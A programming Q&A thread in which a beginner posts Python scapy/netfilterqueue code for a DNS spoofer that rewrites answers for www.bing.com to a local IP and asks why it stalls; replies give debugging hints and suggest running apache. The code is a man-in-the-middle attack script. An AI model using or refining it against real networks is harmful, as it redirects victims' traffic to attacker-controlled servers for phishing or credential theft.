# DNS spoofer and i can't get pass a certain point

Tags: python, dns, scapy, netfilter, spoofing

I am running this code and it seems it isn't even making it pass the second 2nd if statement. Can anyone help? If anyone could help it would appreciative since I am very new to this kind of stuff.

```
import netfilterqueue
import scapy.all as scapy


def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.DNSRR):
        qname = scapy_packet[scapy.DNSQR].qname
        if 'www.bing.com' in qname:
            print('[+] Spoofing Target...')
            answer = scapy.DNSRR(rrname=qname, rdata='10.0.2.8')
            scapy_packet[scapy.DNS].an = answer
            scapy_packet[scapy.DNS].ancount = 1

            del scapy_packet[scapy.IP].chksum
            del scapy_packet[scapy.IP].len
            del scapy_packet[scapy.UDP].len
            del scapy_packet[scapy.UDP].chksum

            packet.set_payload(str(scapy_packet))

    packet.accept()


queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
```

Comment: Have you figured out if it passes the first `if`?

Comment: I think neither one. But i know for sure the second one

Comment: Then add some debugging prints and find out why it does not pass them!

Comment: I add print statements and I get nothing. Not even an error

Comment: After sitting here for 6 minutes it started spamming my print statement and then stopped

Comment: Then you did not add the right print statements at the right places.

Comment: Let us [continue this discussion in chat](https://chat.stackoverflow.com/rooms/214868/discussion-between-easton-antony-and-klaus-d).

Answer (score 0):

bro you need to try this on the HTTP sites first like website.org and check if service apache is run using "service apache2 start"

Comment: Your answer could be improved with additional supporting information. Please [edit] to add further details, such as citations or documentation, so that others can confirm that your answer is correct. You can find more information on how to write good answers [in the help center](/help/how-to-answer).